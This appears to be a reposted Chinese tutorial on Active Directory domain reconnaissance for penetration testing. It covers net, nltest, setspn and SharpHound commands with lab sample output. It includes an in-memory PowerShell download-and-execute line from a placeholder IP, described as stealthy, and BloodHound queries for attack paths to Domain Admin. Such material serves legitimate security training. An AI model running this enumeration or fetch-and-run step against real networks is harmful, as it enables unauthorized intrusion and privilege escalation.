文章总结: 本文系统介绍了域渗透中信息收集的关键技术,涵盖本机身份、系统配置、网络拓扑、域策略、用户组枚举、权限分析和高级探测工具。重点解析了whoami、systeminfo、net系列命令及nltest、SPN枚举、SharpHound等工具的使用方法,提供了完整的命令示例和输出解读,为域环境渗透测试提供了可操作的技术指南。 综合评分: 78 文章分类: 渗透测试,内网渗透,红队,安全工具,实战经验
域渗透学习-信息收集篇
原创
冬夏 冬夏
韭要学JAVA安全
2026年5月5日 15:36 河南
在小说阅读器读本章
去阅读
前言
在域渗透的整个攻击链条中,信息收集是最基础也最关键的一环。无论是初始立足后的本机探查,还是横向移动前的域内拓扑测绘,掌握全面、准确的信息往往决定了后续攻击路径的成败。然而,面对Windows域环境繁杂的命令、众多的信息维度,初学者常常陷入“不知道有哪些可查”、“查到后如何解读”的困境,而有经验的人员也会因临时遗忘某个命令而打断效率。
一、本机用户身份信息收集
1. whoami
作用:查看当前用户及域信息,域环境下展示 域名\\用户名,工作组环境展示主机名\用户名
whoami
输出示例:
LAB\Administrator
2. whoami /all
作用:查询当前用户完整信息,包含SID、所属用户组、系统特权、登录权限等详细内容
whoami /all
输出示例:
用户信息
----------------
用户名 SID
===================== =============================================
WIN10-01\Administrator S-1-5-21-3065368953-1893456789-1234567890-500
组信息
----------------
组名 类型 SID
======================== ================ =============================================
Administrators 本地组 S-1-5-32-544
Remote Desktop Users 本地组 S-1-5-32-555
Everyone 已知组 S-1-1-0
二、主机基础系统信息收集
1. hostname
作用:快速查看当前终端所属主机名称
hostname
输出示例:
WIN10-01
2. systeminfo
作用:获取系统完整配置信息,包含系统版本、补丁更新、系统架构、安装时间、域归属等
systeminfo
输出示例:
主机名: WIN10-01
OS 名称: Microsoft Windows 10 专业版
OS 版本: 10.0.19045 暂缺 Build 19045
系统类型: x64-based PC
域: LAB.COM
登录服务器: \\DC01
已安装的更新: KB5039225、KB5040442
3. set
作用:查看系统全部环境变量,可快速识别域标识变量 USERDOMAIN、LOGONSERVER
set
输出示例:
COMPUTERNAME=WIN10-01
USERDOMAIN=LAB
LOGONSERVER=\\DC01
windir=C:\Windows
三、网络配置与域控解析
1. ipconfig /all
作用:查看完整网卡信息,重点通过DNS后缀判断域名、DNS服务器定位域控IP
ipconfig /all
输出示例:
以太网适配器 以太网:
连接特定的 DNS 后缀 . . . . . . . : lab.com
物理地址. . . . . . . . . . . . . : 00-0C-29-XX-XX-XX
IPv4 地址 . . . . . . . . . . . . : 192.168.10.20
子网掩码 . . . . . . . . . . . . : 255.255.255.0
默认网关. . . . . . . . . . . . . : 192.168.10.1
DNS 服务器 . . . . . . . . . . . : 192.168.10.10
2. nslookup dc.domain.com
作用:解析域控制器域名对应的真实IP地址,需替换为实际环境域名
nslookup dc.lab.com
输出示例:
服务器: DC01.lab.com
Address: 192.168.10.10
名称: dc.lab.com
Address: 192.168.10.10
四、域基础策略与服务器信息
1. net config workstation
作用:查询当前工作站的域归属、登录域、计算机域信息
net config workstation
输出示例:
计算机名 \\WIN10-01
计算机全名 WIN10-01.lab.com
工作站域 LAB
登录域 LAB
软件版本 Windows 10 专业版
2. net time /domain
作用:通过域时间服务获取域控主机名及IP,快速定位域控服务器
net time /domain
输出示例:
\\DC01.lab.com 的当前时间是 2026/05/05 16:30:45
命令成功完成。
3. net accounts /domain
作用:查询域全局密码策略,包含密码有效期、长度要求、登录锁定阈值等
net accounts /domain
输出示例:
强制用户在一段时间后更改密码: 是
密码最短使用期限(天): 1
密码最长使用期限(天): 90
密码长度最小值: 8
保持密码历史记录: 5 个密码
锁定阈值: 5 次无效登录尝试
锁定持续时间(分钟): 30
五、域用户与域组信息枚举
1. net group /domain
作用:枚举当前域内所有全局安全组
net group /domain
输出示例:
域 LAB 上的全局组
--------------------------------
*Domain Admins
*Domain Users
*Enterprise Admins
*Remote Desktop Users
*Print Operators
命令成功完成。
2. net group “Domain Admins” /domain
作用:查询域管理员组所有成员(高权限核心账号)
net group "Domain Admins" /domain
输出示例:
组名 Domain Admins
注释 域管理员拥有对域的完全访问权限
成员
----------------------------------------------------------------
Administrator
LabAdmin
命令成功完成。
3. net group “Enterprise Admins” /domain
作用:查询根域企业管理员组成员,域环境最高权限组
net group "Enterprise Admins" /domain
输出示例:
组名 Enterprise Admins
注释 企业管理员组拥有林中所有域的完全访问权限
成员
----------------------------------------------------------------
Administrator
命令成功完成。
4. net user /domain
作用:列出域内所有存在的用户账号
net user /domain
输出示例:
域 LAB 上的用户账户
--------------------------------
Administrator LabAdmin User01
User02 User03
命令成功完成。
5. net user 用户名 /domain
作用:查询指定域用户详细信息,包含登录时间、密码状态、所属组、权限等
net user User01 /domain
输出示例:
用户名 User01
全名 普通用户01
账户启用 是
上次登录 2026/05/04 09:20:00
密码过期 2026/08/03
本地组成员 Domain Users
六、本地权限与域内主机枚举
1. net localgroup administrators /domain
作用:查询拥有本机本地管理员权限的域用户/域组
net localgroup administrators /domain
输出示例:
别名 administrators
注释 管理员对计算机/域有不受限制的访问权
成员
----------------------------------------------------------------
LAB\Domain Admins
LAB\LabAdmin
本地 Administrator
命令成功完成。
2. net view /domain
作用:枚举域内所有在线计算机NetBIOS名称
net view /domain
输出示例:
域 LAB 中的服务器
--------------------------------
\\DC01
\\WIN10-01
\\WIN10-02
命令成功完成。
3. net view \计算机名
作用:查看目标主机开放的所有共享资源
net view \\DC01
输出示例:
共享名 类型 使用为 注释
----------------------------------------
C$ 磁盘 默认共享
D$ 磁盘 默认共享
SYSVOL 磁盘 域共享目录
NETLOGON 磁盘 域登录目录
七、nltest 域控高级探测命令
1. nltest /dclist:域名
作用:列出当前域内所有域控制器,标注PDC主域控
nltest /dclist:lab.com
输出示例:
测试站点中域 lab.com 的 DC:
\\DC01.lab.com [PDC]
\\DC02.lab.com
命令成功完成
2. nltest /dsgetdc:域名
作用:获取域控详细信息,包含IP、站点、域类型、优先级
nltest /dsgetdc:lab.com
输出示例:
DC: \\DC01.lab.com
地址: 192.168.10.10
域: lab.com
站点: Default-First-Site-Name
标志: PDC GC DS LDAP_KEEPS_SEARCHING
3. nltest /domain_trusts
作用:枚举当前域的所有信任关系(父域、子域、外部域信任)
nltest /domain_trusts
输出示例:
域信任列表:
0: lab.com (本机域)
1: child.lab.com (子域信任)
命令成功完成
4. nltest /user:”用户名”;
作用:验证域用户是否存在,同时获取用户SID、RID信息
nltest /user:"User01"
输出示例:
用户: User01
RID: 1105
SID: S-1-5-21-3065368953-1893456789-1234567890-1105
命令成功完成
八、SPN服务枚举
作用
SPN枚举可快速定位域内SQL、Exchange、HTTP、RPC等服务机器,是Kerberoast攻击、横向移动前期核心收集操作。
1. 枚举域内所有SPN服务
setspn -T lab.com -Q */*
2. 查询指定用户/主机的SPN信息
setspn -L Administrator
setspn -L DC01$
3. 精准筛选指定服务SPN
setspn -Q */* | findstr /i sql
setspn -Q */* | findstr /i http
4. 导出所有SPN结果至本地文件
setspn -T lab.com -Q */* > spn_list.txt
九、SharpHound 使用指南
作用
SharpHound 是 BloodHound 配套的域信息抓取工具,可批量抓取域内用户、机器、组、权限、会话、SPN、信任关系等全量数据,生成压缩包后导入 BloodHound,即可可视化分析域权限链路、高危攻击路径、高价值目标。
1. C# 原生执行(常规全量收集)
本地运行exe,全量采集域信息,生成zip结果包
SharpHound.exe -c All --zipfilename lab_domain.zip
2. PowerShell 内存执行(无落地文件,隐蔽性强)
IEX(New-Object Net.WebClient).DownloadString('http://xxx.xxx.xxx.xxx/SharpHound.ps1')
Invoke-BloodHound -CollectionMethod All -OutputDirectory C:\Windows\Temp
3. 常用收集参数
\-c All:全量收集(用户、机器、组、会话、ACL、SPN、信任关系)\-c SessionOnly:仅收集域内在线主机会话信息\-\-domain lab\.com:指定目标采集域名\-\-zipfilename:自定义输出压缩包名称
4. BloodHound常用
导入数据后,在软件左侧 Pre-Built Analytics Queries 面板一键执行,为域渗透核心分析语句:
- Find all Domain Admins – 查询所有域管理员
- Find Shortest Paths to Domain Admins – 查询到达域管的最短攻击路径
- Find Principals with DCSync Rights – 寻找具有 DCSync 权限的主体(可直接导出域密码哈希)
- Users with Foreign Domain Group Membership – 具有外部域组成员身份的用户(跨域突破口)
- Groups with Foreign Domain Group Membership – 具有外部组成员身份的组(跨域权限载体)
- Map Domain Trusts – 生成域信任地图,梳理父子域、外部域信任关系
- Shortest Paths to Unconstrained Delegation Systems – 到达无约束委派系统的最短路径(高危横向节点)
- Shortest Paths to Kerberoastable Users – 到达可Kerberoast爆破用户的最短路径
- Shortest Paths to Domain Admins from Kerberoastable Users – 从Kerberoast可爆破用户到域管理员的最短提权路径
- Shortest Paths from Owned Principals – 到达已控制/自拥有主体的最短路径
- Shortest Paths to Domain Admins from Owned Principals – 从已控制主体到域管理员的最短提权路径
- Shortest Paths to High Value Targets – 到达域内高价值目标(域控、高权限账号)的最短攻击路径
5. 后续利用操作
将工具生成的 \.zip 数据文件导入 BloodHound 可视化工具,可快速分析:域管理员高权限链路、横向移动节点、委派漏洞、可爆破账号、跨域攻击路径、全域高价值资产分布。
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:韭要学JAVA安全 冬夏 冬夏《域渗透学习-信息收集篇》
版权声明
本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。
评论